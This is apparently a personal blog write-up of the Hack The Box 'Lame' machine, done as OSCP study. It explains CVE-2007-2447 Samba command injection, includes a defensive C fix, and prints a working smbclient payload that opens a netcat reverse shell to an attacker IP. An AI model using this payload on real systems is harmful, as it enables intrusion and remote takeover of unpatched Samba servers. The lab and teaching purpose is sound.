Box 8: HTB - Lame

Lame is a beginner level machine and was the first machine published on Hack The Box, often the first machine for new users prior to its retirement.

Victor Le · 6 min read · Dec 16, 2021

Enumeration

Let's start with an Nmap scan.

nmap -sV -n -vv -Pn -T4 -p- -A 10.10.10.3 --open

PORT STATE SERVICE REASON VERSION
21/tcp open ftp syn-ack ttl 63 vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh syn-ack ttl 63 OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open distccd syn-ack ttl 63 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

At first glance, we can see that the FTP service on this box allows anonymous login (no username or password required).

FTP anonymous login

I could log in to this FTP server successfully, but found that there's nothing here to use. Maybe this is the place where we can upload executable code or malicious files later. I hope so.

Next, I tried the SSH service, but it does not allow anonymous login → skip it for now.

Next, moving on to the SMB service, I can log in anonymously with this one.

Check the directory:

smbclient \\\\10.10.10.3\\tmp

Oops, I found a mess. I really didn't know how useful this mess was.

I actually downloaded all of these and read their contents, but found nothing useful.

CVE-2011-2523

Try using searchsploit with the first service: vsftpd 2.3.4

searchsploit vsftpd 2.3.4

Related to CVE-2011-2523: vsftpd 2.3.4 does have a built-in backdoor, however it is not exploitable on this instance. This is an example of the rabbit holes you'll surely encounter in the OSCP exam 😄

How to exploit vsftpd 2.3.4

Python code: https://www.exploit-db.com/exploits/49757

Ruby code: https://www.exploit-db.com/exploits/17491

Vulnerability Explanation

How to exploit SMB 3.0.20:

CVE-2007-2447: https://www.exploit-db.com/exploits/16320

CVE-2007-2447 allows remote attackers to run commands via the username parameter in Samba 3.0.20 - 3.0.25rc3. Below is the PoC seen in most scripts.

/=`nohup {payload}`

You can find the source code of most of these old versions in the Samba download archive, Index of /pub/samba/stable.

It's a fairly big project, so it's difficult to browse through all the files by hand. After a bit of investigation I found two files that are important to look at:

  • source/lib/smbrun.c
  • source/smbd/map_username.c

Looking into map_username.c we find this little blob of code.

map_username.c

From this we can see that it simply takes the username we provided and combines it with the script set in the smb.conf file to give us a single command string. The cmd variable in this case is /etc/samba/scripts/mapusers.sh, as set by the config file. For more details about the smb.conf file, you can visit: https://www.samba.org/samba/docs/current/man-html/smb.conf.5.html

→ Go to the sections: username map script and username map

That string is then passed to the smbrun() function. Looking at smbrun() in smbrun.c, we see that it hands the unsanitized data straight to the execl() function.

Browsing through the code above this, it's very clear that the cmd variable is never sanitized. So user (our input) is put directly into cmd, and cmd is passed directly to execl(). This is the root cause of the vulnerability. A normal logon request would look like this to execl():

/bin/sh sh -c /etc/samba/scripts/mapscript.sh "Jimmy"

However, if we inject our exploit into the username, this is what gets passed to execl(), giving us command execution:

/bin/sh -c /etc/samba/scripts/mapscript.sh "`nohup {payload}`"

About the execl() function: the exec family has many functions in C. These functions replace the running process image with a new program, so they are used (after a fork) to run a system command in a process separate from the main program and collect its output. More details can be found here: https://linuxhint.com/exec_linux_system_call_c/
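The root cause described above (a username concatenated into one string that sh -c parses) and its fix can be put side by side. The following C is an added example written for this post, not Samba's own code: build_cmd_unsafe() reproduces the flawed string assembly, username_is_safe() is an allowlist check that also works as a detection predicate for usernames seen in session setup logs, and run_map_script_safe() runs the map script through execv() with an argv array so the name is never parsed by a shell. The script path and all sample usernames are assumptions constructed for the example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical stand-in for the "username map script" path that smb.conf
 * would set; the path is an assumption for this example, not a real file. */
#define MAP_SCRIPT "/etc/samba/scripts/mapusers.sh"

/* The flawed pattern the post describes: the username is spliced into one
 * command string that will later be handed to "sh -c". Because the shell
 * parses that string, backticks and $( ) inside the username get executed.
 * Returns a pointer to a static buffer holding the assembled string. */
const char *build_cmd_unsafe(const char *user) {
    static char cmd[512];
    snprintf(cmd, sizeof cmd, "%s \"%s\"", MAP_SCRIPT, user);
    return cmd;
}

/* Allowlist check: a plain account name contains only letters, digits,
 * '.', '_' and '-'. Returns 1 if the name is acceptable, 0 otherwise.
 * The same predicate is useful on the detection side, e.g. to flag
 * usernames in SMB logs that carry shell syntax such as ` or $( . */
int username_is_safe(const char *user) {
    if (user == NULL || *user == '\0' || strlen(user) > 64)
        return 0;
    for (const char *p = user; *p != '\0'; p++) {
        unsigned char c = (unsigned char)*p;
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-'))
            return 0;
    }
    return 1;
}

/* Hardened replacement: refuse names that fail the allowlist, then run the
 * map script with execv() and an argv array. The username reaches the
 * script as one argument; no shell ever parses it, so there is nothing to
 * substitute. Returns the script's exit status, or -1 on refusal/error. */
int run_map_script_safe(const char *user) {
    if (!username_is_safe(user))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { (char *)MAP_SCRIPT, (char *)user, NULL };
        execv(MAP_SCRIPT, argv);
        _exit(127); /* only reached if the script could not be started */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed sample inputs: a normal name and names carrying shell syntax. */
    const char *samples[] = { "Jimmy", "/=`nohup id`", "$(id)", "bob;id" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        printf("username %-14s -> unsafe cmd: %s\n", samples[i],
               build_cmd_unsafe(samples[i]));
        printf("%-23s allowlist: %s\n", "",
               username_is_safe(samples[i]) ? "accept" : "REJECT");
    }
    /* The hardened path refuses the injection without ever spawning a shell. */
    printf("run_map_script_safe(injection) = %d\n",
           run_map_script_safe("/=`nohup id`"));
    return 0;
}
```

The design point is that execv() takes an argument vector, so the shell's quoting and substitution rules never apply to the username; the allowlist is defence in depth and doubles as a cheap log-side indicator for this class of injection.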

The key part of this exploitation is at the bottom. It creates an SMB session using:

  • username = /=`nohup [payload]`
  • password = random or null
  • domain = any user-provided domain

So basically on Linux, backticks ` ` execute a command and put its output in place, just like $(). Both are called command substitution (POSIX specification) and invoke a subshell. The command inside $() or between backticks (`…`) is executed in a subshell and its output is then placed into the original command.

As a marginal note, unlike backticks `…`, the $(…) form can be nested, so you can use a command substitution inside another substitution.

It seems Samba allows that to happen inside the username. The exploit calls nohup (which starts the process detached from the current context) followed by the payload.

Cool! So it's a relatively simple exploit: we abuse backticks in unsanitized text that is passed to sh to gain command execution. But what about the forward slash? Long story short, the "/" acts as a delimiter for the domain field in smbclient. Below is a side-by-side comparison of an attempt to run this exploit with and without the "/" (left without the "/", right with the "/").

Credit: https://0x00sec.org/t/cvexplained-cve-2007-2447/22748

Exploitation

To exploit this vulnerability, you can automate the task with MSF, or use searchsploit and launch the available script:

searchsploit samba 3.0.20

If you want to exploit it manually, keep going…

With the vulnerability explained as above, all we have to do is send a reverse shell command in the username parameter and catch the shell with nc. Let's test it!

Send the payload in the username field with smbclient tool:

smbclient //10.10.10.3/tmp -U "./=`nohup nc -e /bin/sh 10.10.14.7 8080`"

Payload sent

Ensuring my listener is on to catch it:

nc -lvnp 8080

Catching the shell

I do get a shell, but it turns out to be my own machine. I actually don’t know the reason.

By the way, for anyone who doesn't know the smbclient tool, see this page for instructions on using smbclient and all of its valid commands: https://www.samba.org/samba/docs/current/man-html/smbclient.1.html

Another way to log in to SMB is by using the logon command at the smb: \> prompt.

Payload sent once again

Ensuring my listener is on to catch the shell:

nc -lvnp 8080

Catching the shell

Yup!! 🙌 I successfully got a reverse shell with root privileges.

The final task is to spawn an interactive shell with Python and fetch the contents of the root flag.

root.txt

Finally, I end the 8th box here on my journey to study for the OSCP. All comments and criticism from you will help me make much progress. It's going to be a long road ahead 💪

THANKS FOR READING AND SUPPORTING!!
